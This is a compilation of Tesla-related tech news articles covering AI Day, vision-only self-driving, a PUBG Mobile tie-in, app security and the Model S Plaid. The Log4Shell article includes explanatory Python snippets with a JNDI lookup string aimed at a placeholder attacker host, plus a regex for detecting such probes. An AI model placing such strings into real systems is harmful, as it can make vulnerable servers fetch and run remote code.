
Tesla AI Day event: start time and how to watch the live stream

Today is Tesla’s AI Day, a sequel of sorts to the company’s Autonomy Day event held in 2019. The event, which will be held at Tesla’s headquarters in Palo Alto, CA, will be livestreamed for the public starting at 5PM PT / 8PM ET (though the event may not actually begin until closer to 5:30PM PT).

We don’t have a lot of details about what will be announced, but based on the invitation, we’ll get a keynote address by Tesla CEO Elon Musk, hardware and software demos from Tesla engineers, test rides in the Model S Plaid, and “more.” Musk has also tweeted that the “sole goal” of the event is to lure experts in the field of robotics and artificial intelligence to come work at Tesla.

Tesla usually holds around two public events a year. This year, we got the Tesla Model S Plaid launch event in June, and now AI Day. Over the past few years, Tesla has been holding events, not to unveil new products, but to highlight certain technologies that the company views as crucial to its future development. Last year, Tesla held its first Battery Day event, at which it discussed plans to drive down the cost of battery development with the goal of producing a $25,000 electric car.

AI Day is expected to pick up on the themes first introduced during Autonomy Day, which include the manufacturing of Tesla’s own silicon computer chips to power its Full Self-Driving advanced driver assistance feature.

This AI Day comes at an awkward time for the company. Earlier this week, the National Highway Traffic Safety Administration announced that it was investigating Tesla’s Autopilot over nearly a dozen incidents in which its cars crashed into emergency vehicles. Two Democratic senators also called on the Federal Trade Commission to investigate Tesla’s marketing practices for potentially misleading information.



Tesla AI Day: what to expect from Elon Musk’s latest big announcement

It’s been nearly two years since Tesla’s first “Autonomy Day” event, at which CEO Elon Musk made numerous lofty predictions about the future of autonomous vehicles, including his infamous claim that the company would have “one million robotaxis on the road” by the end of 2020. And now it’s time for Part Deux.

This time, the event will be called “AI Day,” and according to Musk, the “sole goal” is to persuade experts in the field of robotics and artificial intelligence to come work at Tesla. The company is known for its high rate of turnover, the latest departure being Jerome Guillen, a key executive who worked at Tesla for 10 years before recently stepping down. Attracting and retaining talent, especially top-tier names, has proven to be a challenge for the company.

The August 19th event is scheduled to start at 5PM PT / 8PM ET at Tesla’s headquarters in Palo Alto, California. According to an invitation obtained by Electrek, it will feature “a keynote by Elon, hardware and software demos from Tesla engineers, test rides in Model S Plaid, and more.” Much like Battery Day, the event will be livestreamed on Tesla’s website, giving investors and the media, as well as the company’s many fans, an up-close look at what’s under development.

Musk and other top officials at the company are expected to provide updates on the rollout of Tesla’s “Full Self-Driving” (FSD) beta version 9, which started reaching more customers this summer. We may also get details about Tesla’s “Dojo” supercomputer, the training of its neural network, and the production of its FSD computer chips. And there will also be “an inside look at what’s next for AI at Tesla beyond our vehicle fleet,” the invitation says.

Let’s start with what we know and work our way toward the speculation of what’s to come.

Tesla Gigafactory - Elon Musk

Photo by Patrick Pleul / picture alliance via Getty Images

FSD rollout

The big news out of Tesla’s first Autonomy Day was the introduction of the company’s first computer chip, a 260 square millimeter piece of silicon that Musk described as “the best chip in the world.” Originally, Musk had claimed that Tesla’s cars wouldn’t need any hardware updates, only software, on the road to full autonomy. Turns out that wasn’t exactly the case; they would need this new chip — two of them, actually — in order to eventually drive themselves.

A lot has happened between the 2019 event and now. Last month, Tesla began shipping over-the-air software updates for FSD beta v9, its long-awaited, definitely not autonomous, but certainly advanced driver assist system. That means Tesla owners who have purchased the FSD option (which now costs $10,000) can finally use many of Autopilot’s advanced driver-assist features on local, non-highway streets, including Navigate on Autopilot, Auto Lane Change, AutoPark, Summon, and Traffic Light and Stop Sign Control.

The update doesn’t make Tesla’s cars fully autonomous, nor will it launch “a million self-driving cars” on the road, as Musk predicted. Tesla owners who have Full Self-Driving still need to pay attention to the road and keep their hands on the steering wheel. Some don’t, which can have tragic consequences.

Loved by fans, loathed by safety advocates, the FSD software has gotten Tesla in a lot of hot water recently. In recently publicized emails between Tesla and California’s Department of Motor Vehicles, the company’s director of Autopilot software made it clear that Musk’s comments (including his tweets) do not reflect the reality of what Tesla’s vehicles can actually do. And now Autopilot is under investigation by federal regulators who want to know why Teslas with Autopilot keep crashing into emergency vehicles.

Aside from the rollout of FSD beta v9, Tesla has also had to adjust to the global chip shortage. In a recent earnings call, Musk said that the company’s engineers had to rewrite some of their software in order to accommodate alternate computer chips. He also said that Tesla’s future growth will depend on a swift resolution to the global semiconductor shortage.

Tesla relies on chips to power everything from its airbags to the modules that control the vehicles’ seatbelts. It’s not clear whether the FSD chips, which are produced by Samsung, are being impacted by the shortage. Musk and his cohort may provide some insight into that during this week’s event.

Credit: Tesla

Dojo

Outside the car, Tesla uses a powerful supercomputer to train the AI software that then gets fed to its customers via over-the-air software updates. In 2019, Musk teased this “super powerful training computer,” which he referred to as “Dojo.”

“Tesla is developing a [neural net] training computer called Dojo to process truly vast amounts of video data,” he later tweeted. “It’s a beast!”

He also hinted at Dojo’s computing power, claiming it was capable of an exaFLOP, or one quintillion (10^18) floating-point operations per second. That is an incredible amount of power. “To match what a one exaFLOP computer system can do in just one second,” NetworkWorld wrote last year, “you’d have to perform one calculation every second for 31,688,765,000 years.”
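That quoted figure checks out with a quick back-of-the-envelope calculation (ours, not from the article’s sources):

```python
# Sanity check: at one calculation per second, how many years does it
# take to match one second of a 1-exaFLOP machine?
ops = 10**18                            # one exaFLOP-second of work
seconds_per_year = 365.25 * 24 * 3600
print(f"{ops / seconds_per_year:.4e}")  # ~3.169e+10 years, i.e. ~31.7 billion
```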

By way of comparison, chipmaker AMD and computer builder Cray are currently working with the US Department of Energy on the design of the world’s fastest supercomputer, with 1.5 exaFLOPs of processing power. Dubbed Frontier, AMD says the supercomputer will have as much processing power as the next 160 fastest supercomputers combined.

When completed, Dojo is expected to be among the most powerful supercomputers on the planet. But rather than performing advanced calculations in areas like nuclear and climate research, Tesla’s supercomputer is running a neural net for the purposes of training its AI software to power self-driving cars. Ultimately, Musk has said Tesla will make Dojo available to other companies that want to use it to train their neural networks.

Earlier this year, Andrej Karpathy, Tesla’s head of AI, gave a presentation at the 2021 Conference on Computer Vision and Pattern Recognition, during which he offered more details about Dojo and its neural network.

“For us, computer vision is the bread and butter of what we do and what enables Autopilot,” Karpathy said, according to Electrek. “And for that to work really well, we need to master the data from the fleet, and train massive neural nets and experiment a lot. So we invested a lot into the compute.”

Other robots?

Earlier this month, Dennis Hong, founder of the Robotics and Mechanisms Laboratory at UCLA, tweeted a photo of a computer chip that many speculate is the in-house hardware used by Tesla’s Dojo.

But Hong is an interesting figure for other reasons, too. He specializes in humanoid robots and was a participant in the DARPA Urban Challenge, which kicked off the race for self-driving cars. (His team placed third.)

Asked on Twitter whether his lab was working with Tesla, Hong posted some playful emojis but otherwise declined to comment. We may learn more about how Hong’s work and Tesla’s pursuits intersect during AI Day.

Musk has been forthcoming about his desires for Tesla to become more than just a car company. “I think long term, people will think of Tesla as much as an AI robotics company as we are a car company or an energy company,” he said earlier this year.


Photo by Andrew Caballero-Reynolds / AFP via Getty Images

The future

A warning for anyone tuning in to the AI Day livestream: take Musk’s predictions about near-term accomplishments with a massive grain of salt. The things that will be discussed during this event are unlikely to have any measurable impact on the company’s business in the months to come.

Self-driving cars are an incredibly difficult challenge. Even companies like Waymo that are perceived to have the best autonomous vehicle technology are still struggling to get it right. Tesla is no different.

“A key question for investors will be what the latest timeline is for achieving full autonomy,” Loup Funds managing partner Gene Munster said in a note. “Despite Elon’s ambitious goal of the end of this year, our best guess is that 2025 will be the first year of public availability of level 4 autonomy.”

The rest of 2021 is already jam-packed for Tesla. The company needs to open factories in Texas and Germany. And it needs to tool up production for its hotly anticipated Cybertruck, which has been delayed until 2022. Full autonomy, such as it is, can wait.





Researchers trigger new exploit by renaming an iPhone and a Tesla

Security researchers investigating the recently discovered and “extremely bad” Log4Shell exploit claim to have used it on devices as varied as iPhones and Tesla cars. Per screenshots shared online, changing the device name of an iPhone or Tesla to a special exploit string was enough to trigger a ping from Apple or Tesla servers, indicating that the server at the other end was vulnerable to Log4Shell.

In the demonstrations, researchers switched the device names to be a string of characters that would send servers to a testing URL, exploiting the behavior enabled by the vulnerability. After the name was changed, incoming traffic showed URL requests from IP addresses belonging to Apple and, in the case of Tesla, China Unicom — the company’s mobile service partner for the Chinese market. In short, the researchers tricked Apple and Tesla servers into visiting a URL of their choice.
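For illustration, here is a minimal sketch of what such an exploit string looks like and how a log pipeline might flag it. The domain is a placeholder, and the regex is a simplified assumption rather than a complete detection rule:

```python
import re

# A Log4Shell-style lookup string; the domain is a placeholder, not an
# endpoint used in the actual demonstrations.
device_name = "${jndi:ldap://attacker-controlled.example/a}"

# Vulnerable log4j versions resolve ${jndi:...} lookups in logged text.
# A simplified scanner (real detection rules also handle obfuscation):
JNDI_PROBE = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

if JNDI_PROBE.search(device_name):
    print("possible Log4Shell probe in device name:", device_name)
```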


An iPhone device information screen with name changed to contain the exploit string.
Image: Cas van Cooten / Twitter

The iPhone demonstration came from a Dutch security researcher; the other was uploaded to the anonymous Log4jAttackSurface GitHub repository.

Assuming the images are genuine, they show behavior — remote resource loading — that should not be possible with text contained in a device name. This proof of concept has led to widespread reporting that Apple and Tesla are vulnerable to the exploit.

While the demonstration is alarming, it’s not clear how useful it would be for cybercriminals. In theory, an attacker could host malicious code at the target URL in order to infect vulnerable servers, but a well-maintained network could prevent such an attack at the network level. More broadly, there’s no indication that the method could lead to any broader compromise of Apple or Tesla’s systems. (Neither company responded to an email request for comment by time of publication.)

Still, it’s a reminder of the complex nature of technological systems, which almost always depend on code pulled in from third-party libraries. The Log4Shell exploit affects an open-source Java tool called log4j, which is widely used for application event logging. It’s still not known exactly how many devices are affected, but researchers estimate that the number is in the millions, including obscure systems that are rarely targeted by attacks of this nature.

The full extent of exploitation in the wild is unknown, but in a blog post, digital forensics platform Cado reported detecting servers trying to use this method to install Mirai botnet code.

Log4Shell is all the more serious for being relatively easy to exploit. The vulnerability works by tricking the application into interpreting a piece of text as a link to a remote resource, and trying to retrieve that resource instead of saving the text as it is written. All that’s necessary is for a vulnerable device to save the special string of characters in its application logs.
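A toy sketch of that mechanism (deliberately simplified, and not log4j’s code): a logger that naively resolves “${jndi:...}” lookups in logged text reproduces the shape of the flaw without fetching anything.

```python
# Toy logger (not log4j) that naively resolves "${jndi:...}" lookups
# found in logged text, illustrating why saving a string can be dangerous.
def naive_log(message: str) -> None:
    start = message.find("${jndi:")
    if start != -1:
        end = message.find("}", start)
        url = message[start + len("${jndi:"):end]   # e.g. "ldap://host/a"
        # A vulnerable logger would fetch (and potentially execute) this
        # remote resource; here we only show that logging triggers it.
        print("would fetch remote resource:", url)
    print("logged:", message)

naive_log("device renamed to ${jndi:ldap://attacker.example/a}")
```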

This creates the potential for vulnerability in many systems that accept user input, since message text can be stored in the logs. The log4j vulnerability was first spotted in Minecraft servers, which attackers could compromise using chat messages; systems that send and receive other message formats like SMS are clearly also susceptible.

At least one major SMS provider appears to be vulnerable to the exploit, according to testing conducted by The Verge. When sent to numbers operated by the SMS provider, text messages containing exploit code triggered a response from the company’s servers that revealed information about the IP address and host name, suggesting that the servers could be tricked into executing malicious code. Calls and emails to the affected company had not been answered at time of publication.

An update to the log4j library has been released to mitigate the vulnerability, but patching all vulnerable machines will take time given the challenges of updating enterprise software at scale.





PUBG Mobile 1.5 update adds Tesla Gigafactory and Model Y

Tencent Games has pushed out update version 1.5 for its hit mobile game PUBG Mobile, giving players a variety of new content, not the least of which is a bigger Tesla collaboration. Under this partnership, PUBG Mobile is now home to a Tesla Gigafactory where players can not only explore the virtual version of the facility but also produce their own Model Y vehicle.

PUBG Mobile 1.5 represents a huge update for the title, which is a mobile game based on the PC title PlayerUnknown’s Battlegrounds. The most notable aspect of the update is the Tesla collaboration, which adds a Gigafactory to Erangel, the game’s most popular map. This is a functional factory, according to the company, one that can be accessed in the Mission Ignition game mode.

Players can activate all of the switches found in the Gigafactory to trigger the vehicle assembly process. The result will be an in-game Model Y SUV, which will include the company’s autopilot mode that players can turn on when driving on the map’s highways. The self-driving vehicle will take players to preset destinations along the road.

In addition, mobile gamers will also notice other autonomous Tesla vehicles in random locations “along the road, in the wild,” according to Tencent. These randomly spawned vehicles will apparently drive themselves around on preset routes. The Tesla Semi will be one such vehicle, which players will be able to damage in order to trigger a supply crate drop.

The wider Mission Ignition mode, meanwhile, will give Erangel an overall tech-heavy update in which half a dozen major regions will sprout new lifts, buildings, moving platforms, and similar additions. HyperLines will enable players to rapidly move between cities on the island, assuming the lines are active. At other times, players can take the Air Conveyor system to move through the sky.

PUBG Mobile version 1.5 is rolling out to players now. You can find the full patch notes on the game’s official website.



‘PUBG Mobile’ update adds a self-driving Tesla Model Y

PUBG Mobile probably isn’t the first game you’d expect to have an electric vehicle tie-in, but it’s here all the same. Krafton and Tencent Games have rolled out a 1.5 update for the phone-focused shooter that includes a raft of not-so-subtle plugs for Tesla and its cars. Most notably, you can find a Model Y on Erangel that can drive itself when you activate an autopilot mode on the highway — not that far off from the real Autopilot mode.

You’ll also find a Gigafactory on Erangel where you can build the Model Y by activating switches, and self-driving Semi trucks roam around the map dropping supply crates when you damage the vehicles. No, despite the imagery, you can’t drive a Cybertruck or Roadster (not yet, at least).

The additions are part of a larger “technological transformation” for Erangel that includes an overhaul of the buildings and new equipment, including an anti-gravity motorcycle.

As is often the case, you shouldn’t expect these updates in regular PUBG — the battle royale brawler for consoles and PCs has a more realistic atmosphere. The PUBG Mobile update is really a not-so-subtle way for Tesla to advertise its EVs in countries where it doesn’t already have strong word-of-mouth working in its favor.




Tesla AI chief explains why self-driving cars don’t need lidar



What is the technology stack you need to create fully autonomous vehicles? Companies and researchers are divided on the answer to that question. Approaches to autonomous driving range from just cameras and computer vision to a combination of computer vision and advanced sensors.

Tesla has been a vocal champion of the pure vision-based approach to autonomous driving, and at this year’s Conference on Computer Vision and Pattern Recognition (CVPR), its chief AI scientist Andrej Karpathy explained why.

Speaking at the CVPR 2021 Workshop on Autonomous Driving, Karpathy, who has led Tesla’s self-driving efforts for the past several years, detailed how the company is developing deep learning systems that need only video input to make sense of the car’s surroundings. He also explained why Tesla is in the best position to make vision-based self-driving cars a reality.

A general computer vision system

Deep neural networks are one of the main components of the self-driving technology stack. Neural networks analyze on-car camera feeds for roads, signs, cars, obstacles, and people.

But deep learning can also make mistakes in detecting objects in images. This is why most self-driving car companies, including Alphabet subsidiary Waymo, use lidar, a device that creates 3D maps of the car’s surroundings by emitting laser beams in all directions. Lidar provides added information that can fill the gaps in the neural networks’ perception.

However, adding lidars to the self-driving stack comes with its own complications. “You have to pre-map the environment with the lidar, and then you have to create a high-definition map, and you have to insert all the lanes and how they connect and all the traffic lights,” Karpathy said. “And at test time, you are simply localizing to that map to drive around.”

It is extremely difficult to create a precise mapping of every location the self-driving car will be traveling. “It’s unscalable to collect, build, and maintain these high-definition lidar maps,” Karpathy said. “It would be extremely difficult to keep this infrastructure up to date.”

Tesla does not use lidars and high-definition maps in its self-driving stack. “Everything that happens, happens for the first time, in the car, based on the videos from the eight cameras that surround the car,” Karpathy said.

The self-driving technology must figure out where the lanes are, where the traffic lights are, what is their status, and which ones are relevant to the vehicle. And it must do all of this without having any predefined information about the roads it is navigating.

Karpathy acknowledged that vision-based autonomous driving is technically more difficult because it requires neural networks that function incredibly well based on the video feeds only. “But once you actually get it to work, it’s a general vision system, and can principally be deployed anywhere on earth,” he said.

With the general vision system, you will no longer need any complementary gear on your car. And Tesla is already moving in this direction, Karpathy says. Previously, the company’s cars used a combination of radar and cameras for self-driving. But it has recently started shipping cars without radar.

“We deleted the radar and are driving on vision alone in these cars,” Karpathy said, adding that the reason is that Tesla’s deep learning system has reached the point where it is a hundred times better than the radar, and now the radar is starting to hold things back and is “starting to contribute noise.”

Supervised learning

The main argument against the pure computer vision approach is that there is uncertainty over whether neural networks can do range-finding and depth estimation without help from lidar depth maps.

“Obviously humans drive around with vision, so our neural net is able to process visual input to understand the depth and velocity of objects around us,” Karpathy said. “But the big question is can the synthetic neural networks do the same. And I think the answer to us internally, in the last few months that we’ve worked on this, is an unequivocal yes.”

Tesla’s engineers wanted to create a deep learning system that could perform object detection along with depth, velocity, and acceleration. They decided to treat the challenge as a supervised learning problem, in which a neural network learns to detect objects and their associated properties after training on annotated data.

To train their deep learning architecture, the Tesla team needed a massive dataset of millions of videos, carefully annotated with the objects they contain and their properties. Creating datasets for self-driving cars is especially tricky, and the engineers must make sure to include a diverse set of road settings and edge cases that don’t happen very often.

“When you have a large, clean, diverse dataset, and you train a large neural network on it, what I’ve seen in practice is… success is guaranteed,” Karpathy said.
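As a rough illustration of that supervised formulation, here is a minimal sketch, with toy shapes and random stand-in data rather than Tesla’s model or dataset, of a network trained to regress object properties such as depth and velocity from images:

```python
# Toy sketch of the supervised setup: a network regresses per-object
# properties (box, depth, velocity) against annotations.
import torch
import torch.nn as nn

class TinyDetector(nn.Module):
    def __init__(self):
        super().__init__()
        self.backbone = nn.Sequential(
            nn.Conv2d(3, 16, 3, stride=2, padding=1), nn.ReLU(),
            nn.Conv2d(16, 32, 3, stride=2, padding=1), nn.ReLU(),
            nn.AdaptiveAvgPool2d(1), nn.Flatten(),
        )
        self.head = nn.Linear(32, 6)   # 4 box coords + depth + velocity

    def forward(self, x):
        return self.head(self.backbone(x))

model = TinyDetector()
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)

frames = torch.randn(8, 3, 64, 64)   # stand-in camera frames
labels = torch.randn(8, 6)           # stand-in annotations

loss = nn.functional.mse_loss(model(frames), labels)
loss.backward()                      # one supervised training step
optimizer.step()
print(float(loss))
```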

Auto-labeled dataset

With millions of camera-equipped cars sold across the world, Tesla is in a great position to collect the data required to train the car vision deep learning model. The Tesla self-driving team accumulated 1.5 petabytes of data consisting of one million 10-second videos and 6 billion objects annotated with bounding boxes, depth, and velocity.
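For a sense of scale, those figures work out to roughly 1.5 GB per 10-second clip across all cameras, a back-of-the-envelope estimate on our part, not a number Tesla has stated:

```python
total_bytes = 1.5e15               # 1.5 petabytes
clips = 1_000_000                  # one million 10-second videos
print(total_bytes / clips / 1e9)   # ~1.5 GB per clip, all cameras combined
```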

But labeling such a dataset is a great challenge. One approach is to have it annotated manually through data-labeling companies or online platforms such as Amazon Mechanical Turk. But this would require a massive manual effort, would cost a fortune, and would be very slow.

Instead, the Tesla team used an auto-labeling technique that involves a combination of neural networks, radar data, and human review. Since the dataset is annotated offline, the neural networks can run the videos back and forth, compare their predictions with the ground truth, and adjust their parameters. This contrasts with test-time inference, where everything happens in real time and the deep learning models have no recourse.

Offline labeling also enabled the engineers to apply very powerful and compute-intensive object detection networks that can’t be deployed on cars and used in real-time, low-latency applications. And they used radar sensor data to further verify the neural network’s inferences. All of this improved the precision of the labeling network.

“If you’re offline, you have the benefit of hindsight, so you can do a much better job of calmly fusing [different sensor data],” Karpathy said. “And in addition, you can involve humans, and they can do cleaning, verification, editing, and so on.”
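A toy example of that hindsight advantage: offline, a noisy per-frame estimate can be smoothed using both past and future frames, something a real-time system cannot do. The numbers are made up, and the zero-padded edges are a simplification:

```python
import numpy as np

# Noisy per-frame depth estimates for one tracked object (made-up values).
depth = np.array([10.2, 9.8, 10.5, 9.9, 10.1])

# Centered moving average: each frame is smoothed using neighbors on both
# sides, which only an offline pass over the whole clip can see.
smoothed = np.convolve(depth, np.ones(3) / 3, mode="same")
print(smoothed)
```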

According to videos Karpathy showed at CVPR, the object detection network remains consistent through debris, dust, and snow clouds.


Above: Tesla’s neural networks can consistently detect objects in various visibility conditions.


Karpathy did not say how much human effort was required to make the final corrections to the auto-labeling system. But human cognition played a key role in steering the auto-labeling system in the right direction.

While developing the dataset, the Tesla team found more than 200 triggers that indicated the object detection needed adjustments. These included problems such as inconsistency between detection results in different cameras or between the camera and the radar. They also identified scenarios that might need special care such as tunnel entry and exit and cars with objects on top.

It took four months to develop and master all these triggers. As the labeling network improved, it was deployed in “shadow mode,” meaning it was installed in consumer vehicles and ran silently without issuing commands to the car. The network’s output was compared to that of the legacy network, the radar, and the driver’s behavior.

The Tesla team went through seven iterations of data engineering. They started with an initial dataset on which they trained their neural network. They then deployed the network in shadow mode on real cars and used the triggers to detect inconsistencies, errors, and special scenarios. The errors were corrected and, where necessary, new data was added to the dataset.

“We spin this loop over and over again until the network becomes incredibly good,” Karpathy said.
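Schematically, the loop Karpathy describes looks something like this; every helper function here is a stand-in for illustration, not Tesla’s pipeline:

```python
# Schematic data-engine loop: train, run in shadow mode, harvest trigger
# events, fold human corrections back into the dataset, repeat.
def train(dataset):
    return {"trained_on": len(dataset)}            # placeholder "model"

def shadow_mode(model, triggers):
    # Runs silently on cars, issuing no commands; trigger rules
    # (e.g. camera/radar disagreement) flag clips for review.
    return [f"clip flagged by: {t}" for t in triggers]

def human_review(flagged):
    return [{"clip": c, "label": "corrected"} for c in flagged]

dataset = [{"clip": i, "label": "initial"} for i in range(100)]
triggers = ["camera/radar disagreement", "tunnel entry/exit"]

for _ in range(7):                  # the article cites seven iterations
    model = train(dataset)
    dataset += human_review(shadow_mode(model, triggers))
```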

So, the architecture can better be described as a semi-auto labeling system with an ingenious division of labor, in which the neural networks do the repetitive work and humans take care of the high-level cognitive issues and corner cases.

Interestingly, when one of the attendees asked Karpathy whether the generation of the triggers could be automated, he said, “[Automating the trigger] is a very tricky scenario, because you can have general triggers, but they will not correctly represent the error modes. It would be very hard to, for example, automatically have a trigger that triggers for entering and exiting tunnels. That’s something semantic that you as a person have to intuit [emphasis mine] that this is a challenge… It’s not clear how that would work.”

Hierarchical deep learning architecture


Tesla’s self-driving team needed a very efficient and well-designed neural network to make the most out of the high-quality dataset they had gathered.

The company created a hierarchical deep learning architecture composed of different neural networks that process information and feed their output to the next set of networks.

The deep learning model uses convolutional neural networks to extract features from the videos of the eight cameras installed around the car and fuses them together using transformer networks. It then fuses them across time, which is important for tasks such as trajectory prediction and for smoothing out inference inconsistencies.

The spatial and temporal features are then fed into a branching structure of neural networks that Karpathy described as heads, trunks, and terminals.

“The reason you want this branching structure is because there’s a huge amount of outputs that you’re interested in, and you can’t afford to have a single neural network for every one of the outputs,” Karpathy said.

The hierarchical structure makes it possible to reuse components for different tasks and enables feature-sharing between the different inference pathways.
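A minimal sketch of that branching idea, with assumed shapes and layer sizes rather than Tesla’s actual architecture: one shared set of per-camera features is fused by a transformer, then fanned out to several task heads.

```python
# Branching "trunk and heads" sketch; all dimensions are assumptions.
import torch
import torch.nn as nn

class BranchingNet(nn.Module):
    def __init__(self, feat=32):
        super().__init__()
        # Shared per-camera feature extractor (the "trunk").
        self.per_camera = nn.Conv2d(3, feat, 3, padding=1)
        # Transformer fuses the eight camera views into one representation.
        self.fuse = nn.TransformerEncoder(
            nn.TransformerEncoderLayer(d_model=feat, nhead=4,
                                       batch_first=True),
            num_layers=1,
        )
        # Task-specific "heads" share everything upstream.
        self.heads = nn.ModuleDict({
            "objects": nn.Linear(feat, 6),
            "lanes": nn.Linear(feat, 4),
            "traffic_lights": nn.Linear(feat, 3),
        })

    def forward(self, cams):                      # cams: (batch, 8, 3, H, W)
        b, n, c, h, w = cams.shape
        x = self.per_camera(cams.flatten(0, 1))   # per-camera features
        x = x.mean(dim=(2, 3)).view(b, n, -1)     # pool into 8 tokens
        fused = self.fuse(x).mean(dim=1)          # cross-camera fusion
        return {name: head(fused) for name, head in self.heads.items()}

outputs = BranchingNet()(torch.randn(2, 8, 3, 32, 32))
print({name: tuple(t.shape) for name, t in outputs.items()})
```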

Another benefit of the network’s modular architecture is the possibility of distributed development. Tesla currently employs a large team of machine learning engineers working on the self-driving neural network. Each of them works on a small component of the network and plugs the results into the larger network.

“We have a team of roughly 20 people who are training neural networks full time. They’re all cooperating on a single neural network,” Karpathy said.

Vertical integration

In his presentation at CVPR, Karpathy shared some details about the supercomputer Tesla is using to train and finetune its deep learning models.

The compute cluster is composed of 720 nodes, each containing eight Nvidia A100 GPUs with 80 gigabytes of video memory, amounting to 5,760 GPUs and more than 450 terabytes of VRAM. The supercomputer also has 10 petabytes of NVMe ultra-fast storage and 640 Tbps of networking capacity to connect all the nodes and allow efficient distributed training of the neural networks.
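Those figures are internally consistent, as a quick check shows:

```python
nodes, gpus_per_node, vram_gb = 720, 8, 80
print(nodes * gpus_per_node)                  # 5,760 GPUs
print(nodes * gpus_per_node * vram_gb / 1e3)  # 460.8 TB of VRAM (> 450 TB)
```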

Tesla also owns and builds the AI chips installed inside its cars. “These chips are specifically designed for the neural networks we want to run for [full self-driving] applications,” Karpathy said.

Tesla’s big advantage is its vertical integration. Tesla owns the entire self-driving car stack. It manufactures the car and the hardware for self-driving capabilities. It is in a unique position to collect a wide variety of telemetry and video data from the millions of cars it has sold. It also creates and trains its neural networks on its proprietary datasets and its in-house compute clusters, and it validates and finetunes the networks through shadow testing on its cars. And, of course, it has a very talented team of machine learning engineers, researchers, and hardware designers to put all the pieces together.

“You get to co-design and engineer at all the layers of that stack,” Karpathy said. “There’s no third party that is holding you back. You’re fully in charge of your own destiny, which I think is incredible.”

This vertical integration and repeating cycle of creating data, tuning machine learning models, and deploying them on many cars puts Tesla in a unique position to implement vision-only self-driving car capabilities. In his presentation, Karpathy showed several examples where the new neural network alone outmatched the legacy ML model that worked in combination with radar information.

And if the system continues to improve, as Karpathy says it will, Tesla might be on track to make lidar obsolete. And I don’t see any other company being able to reproduce Tesla’s approach.

Open issues

But the question remains as to whether deep learning in its current state will be enough to overcome all the challenges of self-driving. Surely, object detection and velocity and range estimation play a big part in driving. But human vision also performs many other complex functions, which scientists call the “dark matter” of vision. Those are all important components in the conscious and subconscious analysis of visual input and navigation of different environments.

Deep learning models also struggle with causal inference, which can be a huge barrier when the models face new situations they haven’t seen before. So, while Tesla has managed to create a huge and diverse dataset, open roads are also very complex environments where new and unpredicted things can happen all the time.

The AI community is divided over whether you need to explicitly integrate causality and reasoning into deep neural networks or if you can overcome the causality barrier through “direct fit,” where a large and well-distributed dataset will be enough to reach general-purpose deep learning. Tesla’s vision-based self-driving team seems to favor the latter (though given their full control over the stack, they could always try new neural network architectures in the future). It will be interesting to see how the technology fares against the test of time.

Ben Dickson is a software engineer and the founder of TechTalks, a blog that explores the ways technology is solving and creating problems.

This story originally appeared on Bdtechtalks.com. Copyright 2021



Elon Musk Promises Tesla App Will Soon Get Improved Security

Tesla boss Elon Musk has said on a number of occasions that two-factor authentication is coming to the Tesla app, but car owners are still waiting.

Responding recently to a customer inquiry asking if it will ever land, Musk acknowledged that the absence of the security measure is somewhat surprising for a company of Tesla’s status.

The CEO apologized for the delay, saying the feature was “embarrassingly late,” adding, “Two-factor authentication via SMS or authentication app is going through final validation right now.”

For those not in the know, two-factor authentication, as the description suggests, is a security feature that requires someone to input two forms of identification to access a smartphone app or some other online service. In most cases, when logging in, you’ll first enter your password, after which the service you’re trying to access will send a one-time code to your phone to enter as the second part of the log-in process. Alternatively, you might be asked to use an authenticator app, which serves up a one-time code to enable you to complete the log-in process.
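For the authenticator-app variant, the one-time code typically comes from the TOTP algorithm (RFC 6238), which any client can implement. Here is a minimal illustrative generator, not Tesla’s implementation; the secret below is a well-known demo value:

```python
# Minimal TOTP (RFC 6238) generator of the kind authenticator apps use.
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, digits: int = 6, period: int = 30) -> str:
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(time.time()) // period)  # 30-s window
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                  # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # demo secret; code changes every 30 seconds
```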

The Tesla app allows owners to lock or unlock their vehicle from a distance, control the air conditioning before climbing in, flash lights and honk the horn when parked (for locating it), and vent/close the panoramic roof, among other things.

With the app an integral part of the Tesla experience, it would certainly give customers peace of mind if they knew that it had another layer of security attached.

Musk’s personal acknowledgement of the absence of two-factor authentication, and revelation that it’s in the final stages of development, suggests that its arrival is imminent.

These days, most online services that involve a login process offer the customer a chance to set up two-factor authentication for improved security. If you haven’t already done so, it’ll be worth diving into the security settings for any service that you use and taking a few minutes to set it up.



Tesla Delivers New Model S Plaid Car to First Customers

Tesla held its Model S Plaid delivery event on Thursday, June 10.

The livestreamed gathering took place at Tesla’s manufacturing facility in Fremont, California.

Tesla CEO Elon Musk arrived on stage in typically modest fashion — by hurtling around the Fremont test track at 100-plus mph in the new all-electric Plaid. Speaking to a small but enthusiastic crowd, Musk then spent 25 minutes running through the car’s plethora of features.


The tri-motor, 1020-horsepower Model S Plaid sits at the top of the Model S range and comes with a serious boost to its performance specs, including a top speed of 200 mph and an astonishingly zippy 0-to-60 time of just 1.99 seconds. In a tweet earlier this week, Musk described the Model S Plaid as the “quickest production car ever made of any kind,” adding, “Has to be felt to be believed.”

The vehicle’s estimated range of 390 miles is the second best among all of Tesla’s electric cars, with only the Model S Long Range able to go further — 412 miles — on a single charge. Tesla had been expected to launch a Plaid+ model, too, featuring additional range, but Musk recently announced that the company had canceled the plan, claiming there was “no need” for it “as Plaid is just so good.” We’ll wait for customer feedback on that one.

The first deliveries of the Model S Plaid come nine months after Tesla started taking orders for the new vehicle, which, at just a shade over $130,000, is the company’s most expensive production vehicle to date. Musk told the crowd the automaker is ready to deliver the first 25 Model S Plaid cars now, increasing to several hundred vehicles a week “soon,” and thousands a week “probably in the next quarter.”

Musk added that the arrival of the Model S variant marked “something that’s quite important about the future of sustainable energy, which is that we have to show that an electric car is the best car, hands down.”



Tesla May Be About to Enter the Restaurant Business

He’s sent rockets to space (and landed them again), given the EV market a much-needed boost, and launched a transportation project for ultra-high-speed travel. Now Elon Musk wants to open a diner.

Say what? A diner? Well, yes, at least according to a recent filing by Tesla for three new trademarks geared toward various restaurant services.

Specifically, Tesla’s filing with the United States Patent and Trademark Office (USPTO) refers to “restaurant services, pop-up restaurant services, self-service restaurant services, take-out restaurant services.”

